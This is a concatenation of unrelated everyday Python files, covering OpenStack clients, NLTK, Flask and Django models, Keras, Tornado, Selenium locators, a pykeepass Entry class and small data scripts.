def init_by_plugin(cls, plugin:BaseIdentityPlugin) -> 'OpenstackClientBase':
return cls(Session(auth=plugin))
@classmethod
def init_by_creds(cls, tenant_id, os_username, os_password, auth_url) -> 'OpenstackClientBase':
plugin = Password(auth_url=auth_url, username=os_username, password=os_password, tenant_id=tenant_id)
return cls.init_by_plugin(plugin)
@classmethod
def init_by_token(cls, token) -> 'OpenstackClientBase':
plugin = AccessInfoPlugin(auth_ref=AccessInfoV2(**token))
return cls.init_by_plugin(plugin)
@property
def keystone_client(self) -> keystone_sclient.Client:
if not self._keystone_client:
self._keystone_client = keystone_sclient.Client(session=self._session)
return self._keystone_client
@property
def ceilometer_client(self) -> ceilometer_client.Client:
if not self._ceilometer_client:
self._ceilometer_client = ceilometer_client.Client(session=self._session)
return self._ceilometer_client
@property
def cinder_client(self) -> cinder_client.Client:
if not self._cinder_client:
self._cinder_client = cinder_client.Client(session=self._session)
return self._cinder_client
@property
def nova_client(self) -> nova_client.Client:
if not self._nova_client:
self._nova_client = nova_client.Client(session=self._session)
return self._nova_client
@property
def neutron_client(self) -> neutron_client.Client:
if not self._neutron_client:
self._neutron_client = neutron_client.Client(session=self._session)
return self._neutron_client
class OpenstackClient(OpenstackClientBase):
def network_create(self, **kwargs):
data = {'network': kwargs}
return self.neutron_client.create_network(body=data)
def network_list(self, **kwargs):
return self.neutron_client.list_networks(**kwargs)
def network_delete(self, network_id):
return self.neutron_client.delete_network(network_id)
def server_create(self, name, image, flavor, **kwargs):
return self.nova_client.servers.create(name=name, image=image, flavor=flavor, **kwargs)
def flavor_list(self, **kwargs):
return self.nova_client.flavors.list(**kwargs)
def image_list(self, **kwargs):
return self.nova_client.images.list(**kwargs) |
from nltk.corpus import wordnet, stopwords
from nltk.corpus import sentiwordnet as swn
from nltk.tokenize import word_tokenize
stop_words = set(stopwords.words('english'))
def getDetails(word):
syns = wordnet.synsets(word)
print("Synsets: {}".format(syns))
for syn in syns:
print("Synset name:" + syn.name())
print("Synset lemmas: {}".format(syn.lemmas()))
print("Synset definition: " + syn.definition())
print("Synset examples: {}".format(syn.examples()))
printSWNresult(syn.name())
def printSWNresult(synetName) :
swn_synset = swn.senti_synset(synetName)
word_sent = swn_synset.pos_score() - swn_synset.neg_score()
print("---SWN results----")
print("Positive score = " + str(swn_synset.pos_score()))
print("Negative score = " + str(swn_synset.neg_score()))
print("Sentiment = " + str(word_sent))
def getRelatedTermsOfWord(word):
syns = wordnet.synsets(word)
syn = syns[0]
print(syn.lemmas())
print(syn.hypernyms())
print(syn.hyponyms())
print(syn.member_holonyms())
print(syn.part_meronyms())
getDetails("wonder")
getRelatedTermsOfWord("dog")
example_sent = "This is a sample sentence, showing off the stop words filtration."
word_tokens = word_tokenize(example_sent)
filtered_sentence = [w for w in word_tokens if not w in stop_words]
print("Word tokens: {}".format(word_tokens))
print("Filtered sentence: {}".format(filtered_sentence)) |
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
username = "root"
pwd = "root"
ip = "127.0.0.1"
port = "3306"
database = "hogwarts"
# 设置mysql 链接方法是
app.config['SQLALCHEMY_DATABASE_URI'] = f'mysql+pymysql://{username}:{pwd}@{ip}:{port}/{database}?charset=utf8'
# 解决warning问题
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
db = SQLAlchemy(app)
class Testcase(db.Model):
id = db.Column(db.String(20), primary_key = True)
node_id = db.Column(db.String(20), nullable = False)
remark = db.remark(db.String(120))
def __init__(self, id, node_id, remark):
self.id = id
self.node_id = node_id
self.remark = remark
def __repr__(self):
return '<Testcase %r>' % self.username
if __name__ == '__main__':
db.drop_all()
db.create_all()
|
from flask import Flask
from config import db
class Applicant(db.Model):
__tablename__ = 'applicants'
id = db.Column(db.Integer,
primary_key=True)
fname = db.Column(db.String(50),
index=False,
unique=False,
nullable=False)
gender = db.Column(db.String(50),
index=False,
unique=False,
nullable=False)
city = db.Column(db.String(50),
index=False,
unique=False,
nullable=False)
def __init__(self,fname,gender,city):
self.fname=fname
self.gender=gender
self.city=city
def serialize(self):
return {
'id':self.id, 'fname':self.fname, 'gender':self.gender,'city':self.city
}
def __repr__(self):
return str(self.serialize()) |
from django.urls import path
from .views import HomePage, ContactPage
urlpatterns = [
path('', HomePage.as_view(), name='home_detail_home'),
path('contact/', ContactPage.as_view(), name='home_detail_contact'),
] |
"""
single root plots - compares 2 root uptake profiles in one plot (root xylem potential, soil-root interface potential, resulting sink)
from xls result files (in results/)
"""
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
add_str = "_comp" # "_wet", "_dry"
# fnames = ["singleroot_cyl_constkrkx" + add_str + ".xls",
# "singleroot_agg_constkrkx" + add_str + ".xls"] #
# days = 0.51
fnames = ["singleroot_sra_dynamic_constkrkx" + add_str + ".xls",
"singleroot_agg_dynamic_constkrkx" + add_str + ".xls"] #
# fnames = ["singleroot_agg_dynamic_constkrkx" + add_str + ".xls"]
days = 7.1
titles = ["Steady rate", "Aggregated"] # "Steady rate", , "Aggregated steady rate", "Rhizosphere"
plot_times = range(0, 7)
type_names = ["psix_", "psiinterface_", "sink_"]
L = 50 # cm root length
path = "results/"
SMALL_SIZE = 16
MEDIUM_SIZE = 16
BIGGER_SIZE = 16
plt.rc('font', size = SMALL_SIZE) # controls default text sizes
plt.rc('axes', titlesize = SMALL_SIZE) # fontsize of the axes title
plt.rc('axes', labelsize = MEDIUM_SIZE) # fontsize of the x and y labels
plt.rc('xtick', labelsize = SMALL_SIZE) # fontsize of the tick labels
plt.rc('ytick', labelsize = SMALL_SIZE) # fontsize of the tick labels
plt.rc('legend', fontsize = SMALL_SIZE) # legend fontsize
plt.rc('figure', titlesize = BIGGER_SIZE) # fontsize of the figure title
prop_cycle = plt.rcParams['axes.prop_cycle']
colors = prop_cycle.by_key()['color']
path = "results/"
# psi_interface = ["psiinterface_singleroot_sra_constkrkx_wet.xls", "psiinterface_singleroot_cyl_constkrkx_wet.xls"]
# labels = ["python sra", "python cylindrical"]
fig, ax = plt.subplots(1, 3, figsize = (15, 10))
ax[0].set_title("$\psi_x$ [cm]")
ax[1].set_title("$\psi_{interface}$ [cm]")
ax[2].set_title("sink [cm$^3$]")
ax[0].set_ylabel("depth [cm]")
ax[0].set_xlabel("xylem potential [cm]")
ax[1].set_xlabel("interface potential [cm]")
ax[2].set_xlabel("root uptake [cm$^3$/day]")
ls = ['-', '-.']
for i in range(0, len(fnames)):
df = pd.read_excel(path + type_names[0] + fnames[i], header = None)
psi_x_ = df.to_numpy()
df1 = pd.read_excel(path + type_names[1] + fnames[i], header = None)
psi_interface_ = df1.to_numpy()
df2 = pd.read_excel(path + type_names[2] + fnames[i], header = None)
sink_ = df2.to_numpy()
z_ = np.linspace(-L + 0.25, -0.25, sink_.shape[1]) # single root 100 segments, 0 - (-50) cm, segment mids
peak_id = np.round(sink_.shape[0] / days * np.array([0.5 + i for i in plot_times]))
peak_id = peak_id.astype(int)
redistribution_id = np.round(sink_.shape[0] / days * np.array([i for i in plot_times]))
redistribution_id = redistribution_id.astype(int)
color_intensity = np.ones((sink_.shape[0]),) * 0.2 + np.linspace(1., 0., sink_.shape[0]) * 0.8
for j in range(0, sink_.shape[0]):
if j == peak_id[0]:
ax[0].plot(psi_x_[j,:], z_, color = [color_intensity[j], 0., 0.], linestyle = ls[i])
ax[1].plot(psi_interface_[j,:], z_, color = [color_intensity[j], 0., 0.], linestyle = ls[i])
ax[2].plot(sink_[j,:], z_, color = [color_intensity[j], 0., 0.], label = "peak " + titles[i], linestyle = ls[i])
if j in peak_id[1:]:
ax[0].plot(psi_x_[j,:], z_, color = [color_intensity[j], 0., 0.], linestyle = ls[i])
ax[1].plot(psi_interface_[j,:], z_, color = [color_intensity[j], 0., 0.], linestyle = ls[i])
ax[2].plot(sink_[j,:], z_, color = [color_intensity[j], 0., 0.], linestyle = ls[i])
if j == redistribution_id[0]:
ax[0].plot(psi_x_[j,:], z_, 'b', linestyle = ls[i])
ax[1].plot(psi_interface_[j,:], z_, 'b:', linestyle = ls[i])
ax[2].plot(sink_[j,:], z_, 'b', label = "initial " + titles[i])
if j == redistribution_id[1]:
ax[0].plot(psi_x_[j,:], z_, color = [0., color_intensity[j], 0.], linestyle = ls[i])
ax[1].plot(psi_interface_[j,:], z_, color = [0., color_intensity[j], 0.], linestyle = ls[i])
ax[2].plot(sink_[j,:], z_, color = [0., color_intensity[j], 0.], label = "redistribution " + titles[i], linestyle = ls[i])
if j in redistribution_id[2:]:
ax[0].plot(psi_x_[j,:], z_, color = [0., color_intensity[j], 0.], linestyle = ls[i])
ax[1].plot(psi_interface_[j,:], z_, color = [0., color_intensity[j], 0.], linestyle = ls[i])
ax[2].plot(sink_[j,:], z_, color = [0., color_intensity[j], 0.], linestyle = ls[i])
if add_str == "_dry":
ax[2].set_xlim(-0.0025, 0.005)
ax[2].legend()
plt.tight_layout()
plt.show()
|
# @Copyright(C), OldFive, 2020.
# @Date : 2021/3/24 0024 15:30:05
# @Author : OldFive
# @Version : 0.1
# @Description :
# @History :
# @Other:
# ▒█████ ██▓ ▓█████▄ █████▒██▓ ██▒ █▓▓█████
# ▒██▒ ██▒▓██▒ ▒██▀ ██▌▓██ ▒▓██▒▓██░ █▒▓█ ▀
# ▒██░ ██▒▒██░ ░██ █▌▒████ ░▒██▒ ▓██ █▒░▒███
# ▒██ ██░▒██░ ░▓█▄ ▌░▓█▒ ░░██░ ▒██ █░░▒▓█ ▄
# ░ ████▓▒░░██████▒░▒████▓ ░▒█░ ░██░ ▒▀█░ ░▒████▒
# ░ ▒░▒░▒░ ░ ▒░▓ ░ ▒▒▓ ▒ ▒ ░ ░▓ ░ ▐░ ░░ ▒░ ░
# ░ ▒ ▒░ ░ ░ ▒ ░ ░ ▒ ▒ ░ ▒ ░ ░ ░░ ░ ░ ░
# ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░░ ░
# ░ ░ ░ ░ ░ ░ ░ ░ ░
# ░ ░
#
"""
历史数据实体类
"""
# Standard library imports
# Third party imports
# Local application imports
class HistoryData(object):
def __init__(self, table_name):
"""存储历史数据"""
table_name = 0
def min(self):
"""返回当前队列中最小值"""
def max(self):
"""返回当前队列中最大值"""
def have(self, num):
"""返回对应值是否存在于队列中"""
def append(self, other):
"""添加新数据到历史数据"""
|
#Binary search
#As opposed to linear search it assigns a left and right value to a sorted array, halves it, and assigns a middle value, then checks if the mid value is the searched value
# if so => search successful
# if not => whether the searched value is bigger or smaller than the mid value, it changes the position of the left/right anchors, and start iteration again
nums = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
sv = 21
def binarysearch(numlist,searchValue):
numlist.sort()
left = 0
right = len(numlist) -1
while left <= right:
mid = round((left+right)/2)
if numlist[mid] == searchValue:
return str(searchValue)+" found"
elif numlist[mid] > searchValue:
right = mid-1
else:
left = mid+1
return "Value not found"
print(binarysearch(nums,sv))
|
# -*- coding: utf-8 -*-
"""
===============================================
Project Name:
Working with Python
-----------------------------------------------
Developer:
Operate:--Orion Analysis Team--
Program:--Vector Data Analysis Team--
...............................................
Author(Analyst):朱立松--Mr.Zhu--
The Chief of Teams
===============================================
"""
import pandas as pd
import numpy as np
import os
alist = []
with open('E:/the_data/tjdaisu.txt',"a+") as log_writter:
for name in os.listdir('E:/the_data/the_all_data/thedata'):
domain = os.path.abspath(r'E:/the_data/the_all_data/thedata') #获取文件夹的路径
info = os.path.join(domain,name) #将路径与文件名结合起来就是每个文件的完整路径
data = pd.read_csv(info) #读取csv数据文件
print('已读取数据文件{}'.format(name))
acc_state = data['acc_state']
gps_speed = data['gps_speed']
accadds = acc_state + gps_speed
adir = {'accadds':list(accadds)}
accadds = pd.DataFrame(adir)
print('已求出状态与速度之和')
data = pd.concat([data,accadds],axis=1)
print('已建立新的数据表格')
file_name = str('E:/the_data/best_data_D/{}'.format(name)) #设置文件及路径名
data.to_csv(file_name) #输出
print('已输出新文件{}'.format(name)) |
# Generated by Django 2.0.6 on 2020-09-15 11:09
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('index', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='tbook',
name='book_price',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='tbook',
name='new_price',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='tcar',
name='count',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='tcar',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='index.TUser'),
),
]
|
#importing libraries here
import pandas as pd
import numpy as np
import seaborn as sns
#import data
df = pd.read_csv('fake_reg.csv')
X = df[['feature1', 'feature2']].values
y = df['price'].values
from sklearn.model_selection import train_test_split
#spliting data
X_train, X_test, y_train ,y_test = train_test_split(X,y,test_size=0.3,random_state=42)
#scaling sets
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
scaler.fit(X_train)
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
#loading models
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense,Activation
model = Sequential()
model.add(Dense(4, activation='relu'))
model.add(Dense(4, activation='relu'))
model.add(Dense(4,activation='relu'))
model.add(Dense(4))
model.compile(optimizer='rmsprop', loss='mse')
#fitting model to train sets
model.fit(X_train,y_train,epochs=250)
from tensorflow.keras.models import load_model
model.save('my_model.h5')
|
# Generated by Django 2.2 on 2019-05-26 08:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hist', '0003_auto_20190525_2113'),
]
operations = [
migrations.AlterField(
model_name='decision',
name='decisionDate',
field=models.DateField(blank=True, null=True),
),
]
|
from django.conf import settings as django_settings
from rest_framework import permissions
from rest_framework.compat import is_authenticated
class IsOwnerOrDeny(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_permission(self, request, view):
return is_authenticated(request.user)
def has_object_permission(self, request, view, obj):
# check if user is owner
return obj.id == request.user.id
class IsValidDisableCustomersToken(permissions.BasePermission):
"""
Custom permission to only allow requests with a valid request.data['token'].
"""
def has_permission(self, request, view):
return request.data.get('token') == django_settings.DISABLE_EXPIRED_CUSTOMERS_TOKEN
class IsAuthenticatedAthlete(permissions.BasePermission):
"""
Custom permissions to only allow requests from athletes
"""
def has_permission(self, request, view):
return is_authenticated(request.user) and request.user.is_athlete()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import logging
import tornado.ioloop
import tornado.web
import tornado.escape
from tornado.options import define, options
import config
from handlers import uimodules
import routers
def config_logging():
level = config.app.logging.get("level")
fmt = config.app.logging.get("format", None)
if fmt:
logging.basicConfig(format=fmt)
if level:
tornado.options.options.logging = level
def remote_debug():
remote = config.app.remote
if remote and remote.get("debug") == "True":
try:
import pydevd
host = remote.get("host")
port = remote.get("port")
pydevd.settrace(host, port=int(port), stdoutToServer=True,
stderrToServer=True)
except ImportError:
logging.error("remote debug start fail! need pycharm-debug.egg!")
class Application(tornado.web.Application):
def __init__(self):
routes = routers.routers
settings = dict(
debug=options.debug,
site_title=config.app.site_title,
cookie_secret=config.app.cookie_secret,
xsrf_cookies=False,
template_path=os.path.join(os.path.dirname(__file__), "template"),
static_path=os.path.join(os.path.dirname(__file__), "resource"),
login_url="/login",
ui_modules=uimodules,
autoescape=None,
)
tornado.web.Application.__init__(self, routes, **settings)
def main():
config_logging()
remote_debug()
logging.info("server start...")
from storage.mysql.database import init_db
init_db()
define("dev", default=False, help="Is development env?", type=bool)
define("port", default=8215, help="run on the given port", type=int)
define("debug", default=False, help="is debug model?", type=bool)
tornado.options.parse_command_line()
app = Application()
app.listen(options.port)
logging.info(
"Statistics server run on the %s and the debug model is %s" % (
options.port, options.debug))
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
|
print("1 : Getting datatype of any value--------- ")
x=67
# print("Type of x is : ",type(x))
print (type(x))
print
Complex=1j
print (type(Complex))
|
from PySide6 import QtGui, QtWidgets, QtCore
import pyqtgraph as pg
import sys, math, time
from collections import deque
import libmapper as mpr
''' TODO
show network interfaces, allow setting
show metadata
'''
class Tree(QtWidgets.QTreeWidget):
def __init__(self):
super(Tree, self).__init__()
self.setDragEnabled(True)
def mouseMoveEvent(self, e):
item = self.itemAt(e.position().toPoint())
if item == None or item.parent() == None:
return
mimeData = QtCore.QMimeData()
mimeData.setText('libmapper://signal ' + item.parent().text(0) + '/' + item.text(0) + ' @id ' + item.text(1))
drag = QtGui.QDrag(self)
drag.setMimeData(mimeData)
dropAction = drag.exec(QtCore.Qt.CopyAction)
class MainWindow(QtWidgets.QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.graph = mpr.Graph(mpr.Type.DEVICE | mpr.Type.SIGNAL)
self.graph.add_callback(self.on_event, mpr.Type.DEVICE | mpr.Type.SIGNAL)
self.setWindowTitle('libmapper signal browser')
self.setGeometry(300, 300, 375, 300)
self.tree = Tree()
self.tree.setHeaderLabels(['name', 'id', 'type', 'length', 'direction'])
self.tree.setColumnHidden(1, True)
self.tree.setColumnWidth(0, 200)
self.tree.setColumnWidth(1, 60)
self.tree.setColumnWidth(2, 50)
self.tree.setColumnWidth(3, 50)
self.tree.setSortingEnabled(True)
self.setCentralWidget(self.tree)
self.timer = QtCore.QTimer()
self.timer.setInterval(25)
self.timer.timeout.connect(self.timer_event)
self.timer.start()
def on_event(self, type, obj, event):
if type == mpr.Type.DEVICE:
if event == mpr.Graph.Event.NEW:
dev_item = QtWidgets.QTreeWidgetItem(self.tree, [obj[mpr.Property.NAME]])
dev_item.setText(1, str(obj[mpr.Property.ID]))
dev_item.setExpanded(True)
elif event == mpr.Graph.Event.REMOVED or event == mpr.Graph.Event.EXPIRED:
items = self.tree.findItems(str(obj[mpr.Property.ID]), QtCore.Qt.MatchFixedString, 1)
for item in items:
item = self.tree.takeTopLevelItem(int(self.tree.indexOfTopLevelItem(item)))
del item
elif type == mpr.Type.SIGNAL:
if event == mpr.Graph.Event.NEW:
# find parent device
dev_items = self.tree.findItems(str(obj.device()[mpr.Property.ID]), QtCore.Qt.MatchFixedString, 1)
for dev_item in dev_items:
sig_item = QtWidgets.QTreeWidgetItem(dev_item, [obj[mpr.Property.NAME], str(obj[mpr.Property.ID]), obj[mpr.Property.TYPE].name.lower(), "{}".format(obj[mpr.Property.LENGTH]), "out" if (obj[mpr.Property.DIRECTION] == mpr.Direction.OUTGOING) else "in"])
elif event == mpr.Graph.Event.REMOVED or event == mpr.Graph.Event.EXPIRED:
sig_items = self.tree.findItems(str(obj[mpr.Property.ID]), QtCore.Qt.MatchFixedString | QtCore.Qt.MatchRecursive, 1)
for sig_item in sig_items:
parent = sig_item.parent()
item = parent.takeChild(int(parent.indexOfChild(sig_item)))
del item
def timer_event(self):
self.graph.poll(10)
def remove_graph(self):
self.graph.free()
app = QtWidgets.QApplication(sys.argv)
main = MainWindow()
import atexit
atexit.register(main.remove_graph)
main.show()
app.exec()
|
from selenium.webdriver.common.by import By
class BasePageLocators:
BASE_PAGE_LOADED_LOCATOR = ''
QUERY_LOCATOR = (By.NAME, 'q')
GO_LOCATOR = (By.ID, 'submit')
INPUT_SUBMIT_LOCATOR = (By.XPATH, "//input[@type='submit']")
class LoginPageLocators(BasePageLocators):
COMPREHENSIONS = (By.XPATH, '//code/span[@class="comment" and contains(text(), "comprehensions")]')
EVENTS_BUTTON = (By.XPATH, '//li[@id="events"]/a[@href="/events/"]')
EVENTS_LINK_TEMPLATE = (By.XPATH, '//li[@id="events"]//a[@href="/events/{}"]')
INTRODUCTION = (By.CSS_SELECTOR, 'div.introduction')
LEARN_MORE_RELATIVE = (By.CSS_SELECTOR, 'a.readmore')
MEMBERSHIP_DRIVE = (By.XPATH, '//a[@href="https://www.python.org/psf/membership/"]')
LOGIN_HEAD_LOCATOR = (By.XPATH, "//div[contains(@class, 'responseHead-module-button')]")
EMAIL_LOCATOR = (By.NAME, "email")
PASSWORD_LOCATOR = (By.NAME, "password")
LOGIN_BUTTON_LOCATOR = (By.XPATH, "//div[contains(@class,'authForm-module-button')]")
USER_LOCATOR = (By.XPATH, "//div[contains(@class, 'right-module-userNameWrap')]")
NOTIFY_EMAIL = (By.XPATH, "//div[contains(@class, 'notify-module-content') and contains(text(), 'Введите email')]")
class PythonEventsPageLocators(BasePageLocators):
EURO_PYTHON_2022 = (By.XPATH, '//a[contains(text(), "EuroPython 2022")]')
LOCATION = (By.CLASS_NAME, 'single-event-location')
class DashboardPageLocators(BasePageLocators):
DASHBOARD = (By.XPATH, "//a[@href = '/dashboard']")
CAMPAIGN_NEW = (By.XPATH, "//a[@href = '/campaign/new']")
CAMPAIGN_NEW_2 = (By.XPATH, "//div[contains(text(), 'Создать кампанию')]")
SETTING_CAMPAIGN = (By.XPATH, "(//div[contains(@data-entity-type, 'campaign')])[2]")
DELETE_LI = (By.XPATH, "//li[@title = 'Удалить']")
SEGMENTS_LOCATOR = (By.XPATH, "//a[@href = '/segments']")
PAGE_LOCATORS_TEMPLATE = (By.XPATH, "//a[@href = '/{}']")
CAMPAIGN_TITLE_TEMPLATE = (By.XPATH, "//a[contains(@title, '{}')]")
class CampaignPageLocators(BasePageLocators):
TRAFFIC = (By.XPATH, "//div[contains(text(), 'Трафик')]")
TEASER = (By.XPATH, "//span[contains(text(), 'Тизер')]")
INPUT_LINK = (By.XPATH, "//input[contains(@data-gtm-id,'ad_url_text')]")
INPUT_FILE = (By.XPATH, "//input[@data-test='image_90x75']")
INPUT_TITLE = (By.XPATH, "//input[@data-name='title_25']")
INPUT_TEXT = (By.XPATH, "//textarea[@data-name='text_90']")
INPUT_CAMPAIGN_TITLE = (By.XPATH, "//div[contains(@class, 'input_campaign-name')]//input")
SUBMIT_BUTTON = (By.XPATH, "//button[./div[contains(text(), 'Создать кампанию')]]")
class SegmentsPageLocators(BasePageLocators):
CREATE_SEGMENT_BUTTON = (By.XPATH, "//a[contains(@href, '/segments/segments_list/new/')]")
SEGMENT_APPS = (
By.XPATH,
"//div[contains(@class, 'adding-segments-modal__block-left')]/div[contains(text(), 'Приложения и игры')]")
SEGMENT_APPS_CHECKBOX = (By.XPATH, "//input[contains(@class, 'adding-segments-source__checkbox')]")
SUBMIT_BUTTON_ADD = (By.XPATH, "//button[./div[contains(text(), 'Добавить сегмент')]]")
SUBMIT_BUTTON_CREATE = (By.XPATH, "//button[./div[contains(text(), 'Создать сегмент')]]")
REMOVE_BUTTON = (By.XPATH, "//div[contains(@data-test, 'remove')]")
INPUT_SEGMENT_TITLE = (By.XPATH, "//div[contains(@class, 'input_create-segment')]//input[contains(text(), '')]")
SEGMENT_TABLE_TITLE = (By.XPATH, "//div[contains(@class, 'main-module-TableWrapper')]//a[contains(text(), '{}')]")
BUTTON_CONFIRM_REMOVE = (By.XPATH, "//button[contains(@class, 'button_confirm-remove')]")
|
n=int(input())
for i in range(n):
a=input()
a=a.upper()
cnt=(len(a)//2)
for j in range(cnt):
if a[j]!=a[-1-j]:
print("#%d No"%(i+1))
break
else:
print("#%d Yes"%(i+1))
#s[::-1]->리버스 시켜주는 구문
|
# FIXME python2
from __future__ import absolute_import, unicode_literals
from future.utils import python_2_unicode_compatible
import logging
from copy import deepcopy
from datetime import datetime
from lxml.builder import E
from lxml.etree import Element, _Element
from lxml.objectify import ObjectifiedElement
import pykeepass.attachment
import pykeepass.group
from pykeepass.baseelement import BaseElement
logger = logging.getLogger(__name__)
reserved_keys = [
'Title',
'UserName',
'Password',
'URL',
'Tags',
'IconID',
'Times',
'History',
'Notes'
]
# FIXME python2
@python_2_unicode_compatible
class Entry(BaseElement):
def __init__(self, title=None, username=None, password=None, url=None,
notes=None, tags=None, expires=False, expiry_time=None,
icon=None, autotype_sequence=None, autotype_enabled=True,
element=None, kp=None):
self._kp = kp
if element is None:
super(Entry, self).__init__(
element=Element('Entry'),
kp=kp,
expires=expires,
expiry_time=expiry_time,
icon=icon
)
self._element.append(E.String(E.Key('Title'), E.Value(title)))
self._element.append(E.String(E.Key('UserName'), E.Value(username)))
self._element.append(
E.String(E.Key('Password'), E.Value(password, protected="False"))
)
if url:
self._element.append(E.String(E.Key('URL'), E.Value(url)))
if notes:
self._element.append(E.String(E.Key('Notes'), E.Value(notes)))
if tags:
self._element.append(
E.Tags(';'.join(tags) if type(tags) is list else tags)
)
self._element.append(
E.AutoType(
E.Enabled(str(autotype_enabled)),
E.DataTransferObfuscation('0'),
E.DefaultSequence(str(autotype_sequence))
)
)
else:
assert type(element) in [_Element, Element, ObjectifiedElement], \
'The provided element is not an LXML Element, but a {}'.format(
type(element)
)
assert element.tag == 'Entry', 'The provided element is not an Entry '\
'element, but a {}'.format(element.tag)
self._element = element
def _get_string_field(self, key):
field = self._xpath('String/Key[text()="{}"]/../Value'.format(key), first=True)
if field is not None:
return field.text
def _set_string_field(self, key, value):
field = self._xpath('String/Key[text()="{}"]/..'.format(key), first=True)
if field is not None:
self._element.remove(field)
self._element.append(E.String(E.Key(key), E.Value(value)))
def _get_string_field_keys(self, exclude_reserved=False):
results = [x.find('Key').text for x in self._element.findall('String')]
if exclude_reserved:
return [x for x in results if x not in reserved_keys]
else:
return results
@property
def attachments(self):
return self._kp.find_attachments(
element=self,
filename='.*',
regex=True,
recursive=False
)
def add_attachment(self, id, filename):
element = E.Binary(
E.Key(filename),
E.Value(Ref=str(id))
)
self._element.append(element)
return pykeepass.attachment.Attachment(element=element, kp=self._kp)
def delete_attachment(self, attachment):
attachment.delete()
def deref(self, attribute):
return self._kp.deref(getattr(self, attribute))
@property
def title(self):
return self._get_string_field('Title')
@title.setter
def title(self, value):
return self._set_string_field('Title', value)
@property
def username(self):
return self._get_string_field('UserName')
@username.setter
def username(self, value):
return self._set_string_field('UserName', value)
@property
def password(self):
return self._get_string_field('Password')
@password.setter
def password(self, value):
return self._set_string_field('Password', value)
@property
def url(self):
return self._get_string_field('URL')
@url.setter
def url(self, value):
return self._set_string_field('URL', value)
@property
def notes(self):
return self._get_string_field('Notes')
@notes.setter
def notes(self, value):
return self._set_string_field('Notes', value)
@property
def icon(self):
return self._get_subelement_text('IconID')
@icon.setter
def icon(self, value):
return self._set_subelement_text('IconID', value)
@property
def tags(self):
val = self._get_subelement_text('Tags')
return val.split(';') if val else val
@tags.setter
def tags(self, value):
# Accept both str or list
v = ';'.join(value if type(value) is list else [value])
return self._set_subelement_text('Tags', v)
@property
def history(self):
if self._element.find('History') is not None:
return [Entry(element=x, kp=self._kp) for x in self._element.find('History').findall('Entry')]
else:
return []
@history.setter
def history(self, value):
raise NotImplementedError()
@property
def autotype_enabled(self):
enabled = self._element.find('AutoType/Enabled')
if enabled.text is not None:
return enabled.text == 'True'
@autotype_enabled.setter
def autotype_enabled(self, value):
enabled = self._element.find('AutoType/Enabled')
if value is not None:
enabled.text = str(value)
else:
enabled.text = None
@property
def autotype_sequence(self):
sequence = self._element.find('AutoType/DefaultSequence')
return sequence.text if sequence is not None else None
@autotype_sequence.setter
def autotype_sequence(self, value):
self._element.find('AutoType/DefaultSequence').text = value
@property
def autotype_associations(self):
associations = self._xpath('AutoType/Association')
result = {}
for a in associations:
result[a.find('Window').text] = getattr(
a.find('KeystrokeSequence'),
'text',
None
)
return result
@property
def is_a_history_entry(self):
parent = self._element.getparent()
if parent is not None:
return parent.tag == 'History'
return False
@property
def path(self):
# The root group is an orphan
if self.is_a_history_entry:
pentry = Entry(
element=self._element.getparent().getparent(),
kp=self._kp
).title
return '[History of: {}]'.format(pentry)
if self.parentgroup is None:
return None
p = self.parentgroup
ppath = ''
while p is not None and not p.is_root_group:
if p.name is not None: # dont make the root group appear
ppath = '{}/{}'.format(p.name, ppath)
p = p.parentgroup
return '{}{}'.format(ppath, self.title)
def set_custom_property(self, key, value):
assert key not in reserved_keys, '{} is a reserved key'.format(key)
return self._set_string_field(key, value)
def get_custom_property(self, key):
assert key not in reserved_keys, '{} is a reserved key'.format(key)
return self._get_string_field(key)
def delete_custom_property(self, key):
if key not in self._get_string_field_keys(exclude_reserved=True):
raise AttributeError('No such key: {}'.format(key))
prop = self._xpath('String/Key[text()="{}"]/..'.format(key), first=True)
if prop is None:
raise AttributeError('Could not find property element')
self._element.remove(prop)
@property
def custom_properties(self):
keys = self._get_string_field_keys(exclude_reserved=True)
props = {}
for k in keys:
props[k] = self._get_string_field(k)
return props
def ref(self, attribute):
"""Create reference to an attribute of this element."""
attribute_to_field = {
'title': 'T',
'username': 'U',
'password': 'P',
'url': 'A',
'notes': 'N',
'uuid': 'I',
}
return '{{REF:{}@I:{}}}'.format(attribute_to_field[attribute], self.uuid.hex.upper())
def touch(self, modify=False):
'''
Update last access time of an entry
'''
now = datetime.now()
self.atime = now
if modify:
self.mtime = now
def save_history(self):
'''
Save the entry in its history
'''
archive = deepcopy(self._element)
hist = archive.find('History')
if hist is not None:
archive.remove(hist)
self._element.find('History').append(archive)
else:
history = Element('History')
history.append(archive)
self._element.append(history)
def __str__(self):
return 'Entry: "{} ({})"'.format(self.path, self.username)
|
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 12 16:40:22 2020
@author: salman
"""
import selenium
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import os
from os import path
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import StaleElementReferenceException
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.expected_conditions import presence_of_element_located
from selenium.webdriver.support import expected_conditions as EC
import requests
import time
import pymongo
import re
from pymongo import MongoClient
from datetime import date
chrome_options = Options()
chrome_options.add_argument("--incognito")
chrome_options.add_argument("--window-size=1920x1080")
